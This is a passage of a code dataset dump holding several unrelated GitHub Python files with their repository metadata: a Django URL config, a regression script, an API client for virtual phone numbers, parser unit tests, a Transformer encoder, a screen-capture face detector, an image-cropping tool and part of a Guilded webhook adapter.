import views\n\napp_name = \"rooms\"\nurlpatterns = [\n path(\"\", views.homepage_view, name=\"homepage\"),\n path(\"topics/\", views.topics_view, name=\"topics\"),\n path(\"activities/\", views.activities_view, name=\"activities\"),\n path(\"room/<int:pk>/\", views.room_detail_view, name=\"room_detail\"),\n path(\"room/add/\", views.room_create_view, name=\"room_create\"),\n path(\"room/<int:pk>/edit/\", views.room_update_view, name=\"room_update\"),\n path(\"room/<int:pk>/delete/\", views.room_delete_view, name=\"room_delete\"),\n path(\"message/<int:pk>/delete/\", views.message_delete_view, name=\"message_delete\"),\n]\n","repo_name":"ArpanIng/Chat-Room","sub_path":"rooms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3104447595","text":"# -*- coding: utf-8 -*-\n# importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#importing the dataset\ndataset = pd.read_csv('Salary_Data.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 1].values\n\n#Splitting dataset into Test and train\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 1/3, random_state = 0)\n\n#Fitting the linear regression model to teh training set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n#Predicting the Test set results\ny_prediciton = regressor.predict(X_test)\n\n#Visualizing the training set\nplt.scatter(X_train, y_train, color = 'red')\nplt.plot(X_train, regressor.predict(X_train), color = 'blue')\nplt.title('Salary vs Experince (Training Set)')\nplt.xlabel('Years of Experince')\nplt.ylabel('Salary')\nplt.show()\n\n#Visualizing the test set\nplt.scatter(X_test, y_test, color = 'red')\nplt.plot(X_train, regressor.predict(X_train), color = 'blue')\nplt.title('Salary vs Experince (Test Set)')\nplt.xlabel('Years of Experince')\nplt.ylabel('Salary')\nplt.show()","repo_name":"ParthJhunjhunwala/Machine-Learning-Concepts","sub_path":"Regression/Linear Regression/simple_linear_regression_me.py","file_name":"simple_linear_regression_me.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38356155279","text":"from PanjSim.user.user import User\nfrom PanjSim.products.products import Products\nfrom PanjSim.purchase.purchase import Purchase\nfrom PanjSim.http_client import HttpClient\nfrom typing import Any\n\n\n\n\nclass PanjSim:\n \n def __init__(self,api_key:str,proxy:dict|None=None) -> None:\n self.session=HttpClient(api_key,proxy)\n \n \n def User(self):\n return User(self.session)\n \n \n def Products(self):\n return Products(self.session)\n \n \n def Purchase(self):\n return Purchase(self.session)\n \n def get_countries_list(self) -> list[dict[str, Any]]:\n '''\n\n { \n 'afghanistan': \n {'iso': {'af': 1}, 'prefix': {'+93': 1}, 'text_en': 'Afghanistan', 'text_ru': 'Афганистан', 'virtual21': {'activation': 1}, 'virtual23': {'activation': 1}, 'virtual32': {'activation': 1}, 'virtual35': {'activation': 1}, 'virtual4': {'activation': 1}},\n \n 'albania': \n {'iso': {'al': 1}, 'prefix': {'+355': 1}, 'text_en': 'Albania', 'text_ru': 'Албания', 'virtual21': {'activation': 1}, 'virtual23': {'activation': 1}, 'virtual32': {'activation': 1}, 'virtual4': {'activation': 1}},\n ....\n }\n \n '''\n endpoint 
= \"/v1/guest/countries\"\n \n\n response = self.session.get(endpoint)\n return response.json()\n \n def get_notification(self,lang:str) -> dict[str, Any]:\n '* lang: Language of notification, ru/en'\n endpoint = f\"/v1/guest/flash/{lang}\"\n response = self.session.get(endpoint)\n return response.json()\n def find_low_price(self,product:str,limit:int=10,available:int=1) -> dict|list:\n '''\n * if limit = 1 return dict low country price else return cost list\n + return {'cost': 8.4, 'count': 2741, 'rate': 6.84, 'contry': 'india', 'operator': 'virtual4'}\n + or: \n + return [{'cost': 8.4, 'count': 2741, 'rate': 6.84, 'contry': 'india', 'operator': 'virtual4'}]\n '''\n product_price=self.Products().get_prices(product=product)\n product_price_data=product_price.get(product)\n \n new=[]\n \n for k in product_price_data:\n v=product_price_data[k]\n nv=[]\n for x,y in v.items():\n \n if y['count'] >= available:\n nv.append((x,y))\n\n \n _sorted = sorted(nv, key=lambda x:x[1].get('cost'))\n if _sorted:\n dat=_sorted[0][1]\n dat['contry']=k\n dat['operator']=_sorted[0][0]\n new.append(dat)\n \n _sorted = sorted(new, key=lambda x:x.get('cost'))\n \n \n return _sorted[:limit] if limit > 1 else _sorted[0]","repo_name":"abbas-bachari/PanjSim","sub_path":"PanjSim/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42104121457","text":"'''Tests on classes/structs.'''\n\nimport unittest\n\nfrom .utils import _code_runner, _code_run_single_class\n\n\nclass TestStructs(unittest.TestCase):\n\n def setUp(self):\n self.tagName = 'struct'\n self.is_class = False\n\n def test_declaration(self):\n s = _code_run_single_class(f'{self.tagName} MyStruct;')\n if self.tagName == 'struct':\n self.assertTrue(s.is_struct)\n else:\n self.assertFalse(s.is_struct)\n self.assertEqual(s.name, 'MyStruct')\n\n def test_only_trivial_ctor(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' MyStruct() {}',\n '};',\n ])\n self.assertEqual(len(s.methods), 1)\n self.assertTrue(s.methods[0].is_ctor)\n self.assertEqual(len(s.methods[0].function.params), 0)\n\n def test_ctor(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' MyStruct(int a, double& b, const float c) {}',\n '};',\n ])\n self.assertEqual(len(s.methods), 1)\n self.assertTrue(s.methods[0].is_ctor)\n ctor = s.methods[0].function\n self.assertEqual(len(ctor.params), 3)\n self.assertEqual(ctor.params[0].name, 'a')\n self.assertTrue(ctor.params[1].type.is_ref)\n self.assertTrue(ctor.params[2].type.is_const)\n\n def test_dtor(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' ~MyStruct()=default;',\n '};',\n ])\n # ignore destructors\n self.assertEqual(len(s.methods), 0)\n\n def test_inheritance(self):\n ns = _code_runner([\n f'{self.tagName} Base {{ }};',\n f'{self.tagName} Child : Base {{ }};',\n ])\n self.assertTrue(len(ns.children), 2)\n b, c = ns.children[0], ns.children[1]\n self.assertEqual(len(b.bases), 0)\n self.assertEqual(len(c.bases), 1)\n self.assertEqual(c.bases[0], 'Base')\n\n def test_inheritance_from_different_namespace(self):\n ns = _code_runner([\n f'namespace ns {{ {self.tagName} Base {{ }}; }}',\n 'struct Child : ns::Base {};',\n ])\n b = ns.children[0].children[0]\n c = ns.children[1]\n self.assertEqual(len(b.bases), 0)\n self.assertEqual(len(c.bases), 1)\n 
self.assertEqual(c.bases[0], 'ns::Base')\n\n def test_removal_of_implicit_functions_from_virtual(self):\n with self.assertWarns(UserWarning):\n s = _code_run_single_class([\n f'{self.tagName} VirtTest {{',\n 'public:'*self.is_class,\n ' virtual int myVirtMethod() { return 0; }',\n '};',\n ])\n # Make sure that implicitly generated methods from the virtual\n # function are not included\n self.assertEqual(len(s.methods), 1)\n\n def test_only_private_methods(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'private:',\n ' void mypriv();',\n ' int mypriv2();',\n ' double mypriv3();',\n ' MyStruct* mypriv4();',\n '};',\n ])\n self.assertEqual(len(s.methods), 0)\n\n def test_protected_methods(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'protected:',\n ' void myprot();',\n ' int myprot2();',\n ' double myprot3();',\n ' MyStruct* myprot4();',\n '};',\n ])\n self.assertEqual(len(s.methods), 0)\n\n def test_mixture_public_protected_private_methods(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'private:',\n ' void mypriv();',\n 'public:',\n ' int mypub();',\n 'private:',\n ' double mypriv2();',\n 'public:',\n ' MyStruct* mypub2();',\n 'protected:',\n ' short myprot();',\n '};',\n ])\n self.assertEqual(len(s.methods), 2)\n self.assertEqual(s.methods[0].function.name, 'mypub')\n self.assertEqual(s.methods[1].function.name, 'mypub2')\n\n def test_class_template(self):\n s = _code_run_single_class([\n 'template<class T>',\n f'{self.tagName} MyStruct {{',\n '};',\n ])\n self.assertEqual(len(s.templateparams), 1)\n self.assertEqual(s.templateparams[0].name, 'T')\n self.assertEqual(s.templateparams[0].tag_used, 'class')\n\n def test_typename_template(self):\n s = _code_run_single_class([\n 'template<typename T>',\n f'{self.tagName} MyStruct {{',\n '};',\n ])\n self.assertEqual(s.templateparams[0].tag_used, 'typename')\n\n def test_nontype_template(self):\n with self.assertWarns(UserWarning), self.assertRaises(ValueError):\n s = _code_run_single_class([\n 'template<int N>',\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' double myArray[N];',\n '};',\n ])\n # Cython does not support nontype templates! Should be no params\n self.assertEqual(len(s.templateparams), 0)\n\n def test_default_template(self):\n s = _code_run_single_class([\n 'template<class T, class U, class V = double&>',\n f'{self.tagName} MyStruct {{ }};',\n ])\n self.assertEqual(s.templateparams[0].default, None)\n self.assertEqual(s.templateparams[1].default, None)\n self.assertEqual(s.templateparams[2].default.name, 'double')\n self.assertTrue(s.templateparams[2].default.is_ref)\n\n def test_template_parameter_pack(self):\n s = _code_run_single_class([\n 'template<class T, class ... 
Types>',\n f'{self.tagName} MyStruct {{ }};',\n ])\n self.assertFalse(s.templateparams[0].is_parameter_pack)\n self.assertTrue(s.templateparams[1].is_parameter_pack)\n\n def test_unnamed_template_parameter_pack(self):\n s = _code_run_single_class([\n 'template<class T, typename...>',\n f'{self.tagName} MyStruct {{ }};',\n ])\n self.assertFalse(s.templateparams[0].is_parameter_pack)\n self.assertTrue(s.templateparams[1].is_parameter_pack)\n self.assertEqual(s.templateparams[1].name, None)\n\n def test_nested_templates(self):\n with self.assertWarns(UserWarning), self.assertRaises(ValueError):\n s = _code_run_single_class([\n 'template <class SomeType, template <class> class OtherType>',\n f'{self.tagName} NestedTemplateStruct {{',\n 'public:'*self.is_class,\n ' OtherType<SomeType> f;',\n '};',\n ])\n # template-template parameters are currently not supported\n self.assertEqual(len(s.templateparams), 1)\n\n def test_templated_methods(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' template<class T, typename U, class V = double *const>',\n ' void myfun(T t, U u, V v);'\n '};',\n ])\n m = s.methods[0].function\n self.assertEqual(m.templateparams[0].name, 'T')\n self.assertEqual(m.templateparams[0].tag_used, 'class')\n self.assertEqual(m.templateparams[1].name, 'U')\n self.assertEqual(m.templateparams[1].tag_used, 'typename')\n self.assertEqual(m.templateparams[2].name, 'V')\n self.assertEqual(m.templateparams[2].tag_used, 'class')\n self.assertEqual(m.templateparams[2].default.name, 'double')\n self.assertTrue(m.templateparams[2].default.is_const_ptr)\n\n def test_nested_class(self):\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n f' {self.tagName} MyInnerStruct {{}};',\n '};',\n ])\n self.assertEqual(s.name, 'MyStruct')\n self.assertEqual(len(s.children), 1)\n self.assertEqual(s.children[0].name, 'MyInnerStruct')\n\n def test_curiously_recurring_template_pattern(self):\n pass\n\n def test_typedef(self):\n '''make a typedef inside a struct/class'''\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' typedef int myInt;',\n '};',\n ])\n self.assertEqual(len(s.typedefs), 1)\n td = s.typedefs[0]\n self.assertEqual(td.name, 'myInt')\n self.assertEqual(td.type.name, 'int')\n\n def test_data_member_modifiers(self):\n '''Create public data members with various modifiers.'''\n s = _code_run_single_class([\n f'{self.tagName} MyStruct {{',\n 'public:'*self.is_class,\n ' int myInt;',\n ' int & myInt_ref;',\n ' int // some comment here',\n '* myInt_star;',\n ' const int /* this is obtrusive */ const_myInt;',\n ' int *',\n 'const // this is a const ptr, not const val',\n 'myInt_star_const',\n ';',\n '};',\n ])\n self.assertEqual(s.fields[0].name, 'myInt')\n self.assertEqual(s.fields[1].name, 'myInt_ref')\n self.assertTrue(s.fields[1].type.is_ref)\n self.assertEqual(s.fields[2].name, 'myInt_star')\n self.assertTrue(s.fields[2].type.is_ptr)\n self.assertEqual(s.fields[3].name, 'const_myInt')\n self.assertTrue(s.fields[3].type.is_const)\n self.assertEqual(s.fields[4].name, 'myInt_star_const')\n self.assertTrue(s.fields[4].type.is_ptr)\n self.assertTrue(s.fields[4].type.is_const_ptr)\n\n # def test_templated_data_members(self):\n # ns = _code_runner([\n # 'template<class U>',\n # f'{self.tagName} T {{ }};',\n # '',\n # f'{self.tagName} MyStructI {{',\n # 'public:'*self.is_class,\n # ' T<int> myInt;',\n # ' T<int&> myInt_ref;',\n # ' T<int*> myInt_star;',\n # ' T<const 
int> const_myInt;',\n # ' T<int *const> myInt_star_const;',\n # '};',\n # ])\n # print(ns)\n\n\nclass TestClasses(TestStructs):\n def setUp(self):\n self.tagName = 'class'\n self.is_class = True\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mckib2/cythonator","sub_path":"tests/test_classes.py","file_name":"test_classes.py","file_ext":"py","file_size_in_byte":10681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11560747798","text":"with open ('words.txt','r') as wl:\r\n w = wl.read().split(' ')\r\ni = len(w)\r\nwhile ( i > 0 ):\r\n sb = 0\r\n sg = 0\r\n for x in w[i-1]:\r\n if ( x == 'r' or x == 'R' or x == 'f' or x == 'F' or x =='c' or x == 'C' or x == 'k' or x== 'K' ):\r\n sb += 1\r\n elif ( x == 'a' or x == 'A' or x == 'e' or x == 'E' or x == 'i' or x == 'I' or x == 'o' or x == 'O' or x == 'u' or x == 'U' or x == 'y' or x == 'Y' ):\r\n #Εδώ υπάρχει το παράδοξο πως το y καμία φορά θεωρε��ται και σύμφωνο αλλά έπρεπε κάπου να το κατατάξω οπότε το έβαλα στα φωνήεντα...\r\n sb = sb #ξέρω οτι αυτό δεν κάνει τ'ιποτα αλλά δεν ήθελα να το αφήσω κενό XD\r\n else:\r\n sg += 1\r\n if ( sg >= sb ):\r\n w[i-1] = \"good\"\r\n else:\r\n w[i-1] = \"bad\"\r\n i = i - 1 \r\nprint(w) \r\n \r\n","repo_name":"Awott/PythPats","sub_path":"ask2.py","file_name":"ask2.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"el","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16199219711","text":"import torch.nn as nn\nfrom ..utils import clones\nfrom ..layers import LayerNorm, SublayerConnection\n\n\nclass Encoder(nn.Module):\n \"Transformer encoder core which is the general logic + a stack of N layers\"\n\n def __init__(self, layer, N):\n \"\"\"\n :param layer: depth one Transformer logic\n :param N: Depth of Transformer\n \"\"\"\n super(Encoder, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n\n def forward(self, x, mask):\n \"Pass the input (and mask) through each layer in turn.\"\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)\n\n\nclass EncoderLayer(nn.Module):\n \"Encoder is made up of self-attn and feed forward (defined below)\"\n\n def __init__(self, size, self_attn, feed_forward, dropout):\n \"\"\"\n :param size: model dimensionality\n :param self_attn: self attention layer\n :param feed_forward: feed forward layer\n :param dropout: probability dropout\n \"\"\"\n super(EncoderLayer, self).__init__()\n self.self_attn = self_attn\n self.feed_forward = feed_forward\n self.sublayer = clones(SublayerConnection(size, dropout), 2)\n self.size = size # d_model\n\n def forward(self, x, mask):\n \"\"\"\n Masked forward pass\n\n :param x: input\n :param mask: attention mask\n :return: model output\n \"\"\"\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))\n return self.sublayer[1](x, self.feed_forward)\n","repo_name":"MischaD/Benchmarking-Univariate-Time-Series-Prediction","sub_path":"src/models/transformer/encoder/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"28109423291","text":"from mss import mss\nimport numpy as np\nimport cv2\nimport time\nimport pprint\n\n\nclass Recorder:\n # constructor\n def __init__(self):\n self.fps = 30 # define fps for recording\n self.screen_shot = None\n self.monitor = None\n self.face_img_map = {}\n self.face_number = 0\n # save for 
memory conservation\n with mss() as screen_shot:\n self.screen_shot = screen_shot\n self.monitor = screen_shot.monitors[1]\n # for Cascade-classifier\n self.path_cascade = \"./etc/cascades/haarcascade_frontalface_default.xml\"\n self.face_cascade = cv2.CascadeClassifier(self.path_cascade)\n\n # return image as array\n # image can be shown by using \"cv2.imshow\" directly\n def record(self):\n return np.array(self.screen_shot.grab(self.monitor))\n\n # to reduce memory comsumpution and keep overall view\n def resize_image(self, raw_img):\n height = raw_img.shape[0]\n width = raw_img.shape[1]\n return cv2.resize(raw_img, (96, 96))\n\n # clip faces, using Haar-like feature\n def detect_face(self, raw_img):\n # input_size of the model based on AffectNet is: 3 x 96 x 96\n faces = self.face_cascade.detectMultiScale(raw_img, minSize=(256, 256))\n # if faces are not detected, return\n self.face_number = len(faces)\n if self.face_number == 0:\n return\n # process for each face\n for i, face in enumerate(faces):\n x, y, w, h = face\n self.face_img_map[\"face_img_\" +\n str(i)] = raw_img[y: y + h, x: x + w]\n\n def show_as_video(self):\n while True:\n # common process: get image, delete image,\n # resize image, and detect image\n # get image and show it\n raw_img = self.record()\n # cv2.imshow(\"preview_raw\", raw_img)\n # detect faces\n self.detect_face(raw_img)\n # delete unused set of map\n img_map_number = len(self.face_img_map)\n for i in range(img_map_number - self.face_number):\n target_number = self.face_number + i\n del self.face_img_map[\"face_img_\" + str(target_number)]\n cv2.destroyWindow(\"preview_\" + str(target_number))\n # process for each faces\n for i, img_key in enumerate(self.face_img_map):\n img = self.resize_image(self.face_img_map[img_key])\n # if you want to preview each face image, activate\n cv2.imshow(\"preview_\" + str(i), img)\n\n # show overview image\n print(self.face_img_map.keys())\n # if ESC is pressed, break and destroy window\n if cv2.waitKey(1) == 27:\n break\n time.sleep(1 / self.fps) # wait to avoid over running\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n recorder = Recorder()\n recorder.show_as_video()\n","repo_name":"WakishiDeer/display_recorder","sub_path":"display_record_face.py","file_name":"display_record_face.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70543596733","text":"import argparse\nimport glob\nimport json\nimport logging\nimport multiprocessing as mproc\nimport os\nimport sys\nfrom functools import partial\n\nimport numpy as np\nfrom imsegm.utilities.data_io import update_path\nfrom imsegm.utilities.experiments import WrapExecuteSequence\nfrom scipy.ndimage import filters\n\nsys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root\nfrom bpdl.data_utils import export_image, load_image\nfrom bpdl.utilities import estimate_rolling_ball\n\nNB_WORKERS = int(mproc.cpu_count() * .75)\nNAME_JSON_BBOX = 'cut_bounding_box.json'\nLOAD_SUBSET_COEF = 5\nMETHODS = ['cum-info', 'line-sum', 'line-grad']\nDEFAULT_PARAMS = {\n 'path_in': os.path.join(update_path('data_images'), 'imaginal_discs', 'gene', '*.png'),\n 'path_out': os.path.join(update_path('data_images'), 'imaginal_discs', 'gene_cut'),\n}\n\n\ndef args_parse_params(params):\n \"\"\" create simple arg parser with default values (input, output)\n\n :param dict dict_params:\n :return obj: object argparse<...>\n \"\"\"\n parser = argparse.ArgumentParser()\n 
parser.add_argument(\n '-i',\n '--path_in',\n type=str,\n required=True,\n default=params['path_in'],\n help='path to the folder with input image dataset'\n )\n parser.add_argument(\n '-o',\n '--path_out',\n type=str,\n required=True,\n default=params['path_out'],\n help='path to the output with experiment results'\n )\n parser.add_argument(\n '-t', '--threshold', type=float, required=False, default=0.001, help='threshold for image information'\n )\n parser.add_argument(\n '-m', '--thr_method', type=str, required=False, default='', choices=METHODS, help='used methods'\n )\n parser.add_argument(\n '--nb_workers', type=int, required=False, default=NB_WORKERS, help='number of parallel processes'\n )\n\n args = vars(parser.parse_args())\n for k in (k for k in args if k.startswith('path_')):\n p = update_path(os.path.dirname(args[k]))\n assert os.path.exists(p), 'missing (%s): %s' % (k, p)\n args[k] = os.path.join(p, os.path.basename(args[k]))\n return args\n\n\ndef load_mean_image(paths_img):\n img_cum = None\n for p_img in paths_img:\n _, img = load_image(p_img, fuzzy_val=True)\n img = img.astype(np.float64)\n if img_cum is None:\n img_cum = img\n else:\n img_cum = img_cum + img\n img_mean = img_cum / float(len(paths_img))\n return img_mean\n\n\ndef check_bounding_box(bbox, img_size):\n for i in range(2):\n # if left cut is over right cut reset it\n if bbox[i] > (img_size[i] - bbox[i + 2]):\n logging.debug('reset BBox (%i, %i) for size %i', bbox[i], bbox[i + 2], img_size[i])\n bbox[i] = 0\n bbox[i + 2] = 0\n return bbox\n\n\ndef find_min_bbox_cumul_sum(img, threshold=0):\n logging.info('find bbox using cumulative info with thr=%f', threshold)\n img_norm = img / np.sum(img)\n bbox = []\n for _ in range(4):\n rows = np.sum(img_norm, axis=0)\n for i, _ in enumerate(rows):\n if np.sum(rows[:i]) >= threshold:\n bbox.append(i)\n break\n img_norm = np.rot90(img_norm)\n return bbox\n\n\ndef find_min_bbox_line_sum(img, threshold=0):\n logging.info('find bbox using line sum with thr=%f', threshold)\n bbox = []\n for _ in range(4):\n rows = np.mean(img, axis=0)\n rows = rows / np.max(rows)\n for i, r in enumerate(rows):\n if r >= threshold:\n bbox.append(i)\n break\n img = np.rot90(img)\n return bbox\n\n\ndef find_min_bbox_grad(img):\n logging.info('find bbox using Gradient')\n bbox = []\n for _ in range(4):\n rows = np.mean(img, axis=0)\n rows_cum = np.cumsum(rows / np.sum(rows))\n rows_cum = filters.gaussian_filter1d(rows_cum, sigma=1)\n\n pts = np.array(list(zip(range(len(rows_cum)), rows_cum)))\n diams = estimate_rolling_ball(pts, tangent_smooth=1)\n bbox.append(np.argmin(diams[0]))\n\n img = np.rot90(img)\n return bbox\n\n\ndef export_bbox_json(path_dir, bbox, name=NAME_JSON_BBOX):\n d_bbox = dict(zip(['left', 'top', 'right', 'bottom'], bbox))\n path_json = os.path.join(path_dir, name)\n logging.info('exporting JSON: %s', path_json)\n with open(path_json, 'w') as fp:\n json.dump(d_bbox, fp)\n return d_bbox\n\n\ndef export_cut_image(path_img, d_bbox, path_out):\n name, im = load_image(path_img)\n im_cut = im[d_bbox['top']:-d_bbox['bottom'], d_bbox['left']:-d_bbox['right']]\n export_image(path_out, im_cut, name)\n\n\ndef main(path_pattern_in, path_out, nb_workers=NB_WORKERS):\n assert os.path.isdir(os.path.dirname(path_pattern_in)), 'missing: %s' % path_pattern_in\n assert os.path.isdir(os.path.dirname(path_out)), 'missing: %s' % os.path.dirname(path_out)\n\n if not os.path.isdir(path_out):\n logging.info('create dir: %s', path_out)\n os.mkdir(path_out)\n\n list_img_paths = 
glob.glob(path_pattern_in)\n logging.info('found images: %i', len(list_img_paths))\n\n # create partial subset with image pathes\n list_img_paths_partial = [\n list_img_paths[i::nb_workers * LOAD_SUBSET_COEF] for i in range(nb_workers * LOAD_SUBSET_COEF)\n ]\n list_img_paths_partial = [ls for ls in list_img_paths_partial if ls]\n mean_imgs = list(\n WrapExecuteSequence(load_mean_image, list_img_paths_partial, nb_workers=nb_workers, desc='loading mean images')\n )\n # imgs, im_names = tl_data.dataset_load_images(list_img_paths, nb_workers=1)\n img_mean = np.mean(np.asarray(mean_imgs), axis=0)\n export_image(path_out, img_mean, 'mean_image')\n\n logging.info('original image size: %r', img_mean.shape)\n # bbox = find_min_bbox_cumul_sum(img_mean, params['threshold'])\n if params['thr_method'] == 'line-grad':\n bbox = find_min_bbox_grad(img_mean)\n elif params['threshold'] == 0:\n bbox = [0] * 4\n elif params['thr_method'] == 'line-sum':\n bbox = find_min_bbox_line_sum(img_mean, params['threshold'])\n else:\n bbox = find_min_bbox_cumul_sum(img_mean, params['threshold'])\n d_bbox = export_bbox_json(path_out, bbox)\n logging.info('found BBox: %r', d_bbox)\n\n _cut_export = partial(export_cut_image, d_bbox=d_bbox, path_out=path_out)\n list(WrapExecuteSequence(_cut_export, list_img_paths, nb_workers, desc='exporting cut images'))\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n logging.info('running...')\n\n params = args_parse_params(DEFAULT_PARAMS)\n main(params['path_in'], params['path_out'], nb_workers=params['nb_workers'])\n\n logging.info('DONE')\n","repo_name":"Borda/pyBPDL","sub_path":"experiments/run_cut_minimal_images.py","file_name":"run_cut_minimal_images.py","file_ext":"py","file_size_in_byte":6690,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"33742116575","text":"from __future__ import annotations\nimport io\n\nimport logging\nimport asyncio\nimport json\nimport re\n\nfrom typing import TYPE_CHECKING, Any, Dict, List, Optional, Sequence, Tuple, Union\nfrom contextvars import ContextVar\n\nimport aiohttp\n\nfrom .. 
import utils\nfrom ..channel import ChatChannel, ListChannel\nfrom ..enums import FileType, MediaType\nfrom ..errors import HTTPException, Forbidden, NotFound, GuildedServerError\nfrom ..message import ChatMessage\nfrom ..user import Member, User\nfrom ..utils import ISO8601, find\nfrom ..asset import Asset\nfrom ..http import Route, UserbotRoute, handle_message_parameters\nfrom ..file import File\n\n__all__ = (\n 'Webhook',\n 'WebhookMessage',\n)\n\nlog = logging.getLogger(__name__)\n\nif TYPE_CHECKING:\n from ..abc import TeamChannel\n from ..http import HTTPClient\n from ..embed import Embed\n from ..team import Team\n import datetime\n\n from ..types.webhook import Webhook as WebhookPayload\n\nMISSING = utils.MISSING\n\n\nclass AsyncWebhookAdapter:\n async def request(\n self,\n route: Union[UserbotRoute, Route],\n session: aiohttp.ClientSession,\n webhook_id: str,\n *,\n payload: Optional[Dict[str, Any]] = None,\n multipart: Optional[List[Dict[str, Any]]] = None,\n files: Optional[List[File]] = None,\n auth_token: Optional[str] = None,\n params: Optional[Dict[str, Any]] = None,\n userbot: bool = None,\n ) -> Any:\n headers: Dict[str, str] = {}\n files = files or []\n to_send: Optional[Union[str, aiohttp.FormData]] = None\n\n if auth_token is not None:\n if userbot is None:\n raise ValueError('userbot must be provided if auth_token is also provided.')\n\n if userbot:\n headers['guilded-client-id'] = auth_token\n headers['cookie'] = f'guilded_mid={auth_token}'\n else:\n headers['Authorization'] = f'Bearer {auth_token}'\n\n if payload is not None:\n headers['Content-Type'] = 'application/json'\n to_send = json.dumps(payload)\n\n response: Optional[aiohttp.ClientResponse] = None\n data: Optional[Union[Dict[str, Any], str]] = None\n method = route.method\n url = route.url\n\n for attempt in range(5):\n for file in files:\n file.reset(seek=attempt)\n\n if multipart:\n form_data = aiohttp.FormData(quote_fields=False)\n for p in multipart:\n form_data.add_field(**p)\n to_send = form_data\n\n try:\n async with session.request(method, url, data=to_send, headers=headers, params=params) as response:\n log.debug(\n 'Webhook ID %s with %s %s has returned status code %s',\n webhook_id,\n method,\n url,\n response.status,\n )\n data = (await response.text(encoding='utf-8')) or None\n if data and response.headers['Content-Type'] == 'application/json':\n data = json.loads(data)\n\n if 300 > response.status >= 200:\n return data\n\n if response.status == 429:\n if not response.headers.get('Via'):\n raise HTTPException(response, data)\n\n retry_after: float\n try:\n retry_after = float(data['retry_after'])\n except (KeyError, TypeError):\n retry_after = 3.0\n\n log.warning('Webhook ID %s is rate limited. 
Retrying in %.2f seconds', webhook_id, retry_after)\n await asyncio.sleep(retry_after)\n continue\n\n if response.status >= 500:\n await asyncio.sleep(1 + attempt * 2)\n continue\n\n if response.status == 403:\n raise Forbidden(response, data)\n elif response.status == 404:\n raise NotFound(response, data)\n else:\n raise HTTPException(response, data)\n\n except OSError as e:\n if attempt < 4 and e.errno in (54, 10054):\n await asyncio.sleep(1 + attempt * 2)\n continue\n raise\n\n if response:\n if response.status >= 500:\n raise GuildedServerError(response, data)\n raise HTTPException(response, data)\n\n raise RuntimeError('Unreachable code in HTTP handling.')\n\n def get_webhook(\n self,\n server_id: str,\n webhook_id: str,\n *,\n auth_token: str,\n userbot: bool,\n session: aiohttp.ClientSession,\n ):\n if userbot:\n route = UserbotRoute('GET', f'/teams/{server_id}/members')\n else:\n route = Route('GET', f'/servers/{server_id}/webhooks/{webhook_id}')\n\n return self.request(route, session, webhook_id, auth_token=auth_token, userbot=userbot)\n\n def get_webhook_details(\n self,\n server_id: str,\n webhook_id: str,\n *,\n auth_token: str,\n session: aiohttp.ClientSession,\n ):\n # This method is intentionally limited so that it fits the \"model\" of single-entity operations here.\n\n route = UserbotRoute('POST', f'/teams/{server_id}/webhooks/detail')\n payload = {\n 'webhookIds': [webhook_id],\n }\n return self.request(route, session, webhook_id, payload=payload, auth_token=auth_token, userbot=True)\n\n def delete_webhook(\n self,\n server_id: str,\n webhook_id: str,\n *,\n auth_token: str,\n userbot: bool,\n session: aiohttp.ClientSession,\n ):\n if userbot:\n route = UserbotRoute('DELETE', f'/webhooks/{webhook_id}')\n else:\n route = Route('DELETE', f'/servers/{server_id}/webhooks/{webhook_id}')\n\n return self.request(route, session, webhook_id, auth_token=auth_token, userbot=userbot)\n\n def update_webhook(\n self,\n server_id: str,\n webhook_id: str,\n payload: Dict[str, Any],\n *,\n auth_token: str,\n userbot: bool,\n session: aiohttp.ClientSession,\n ):\n if userbot:\n route = UserbotRoute('PUT', f'/webhooks/{webhook_id}')\n else:\n route = Route('PUT', f'/servers/{server_id}/webhooks/{webhook_id}')\n\n return self.request(route, session, webhook_id, payload=payload, 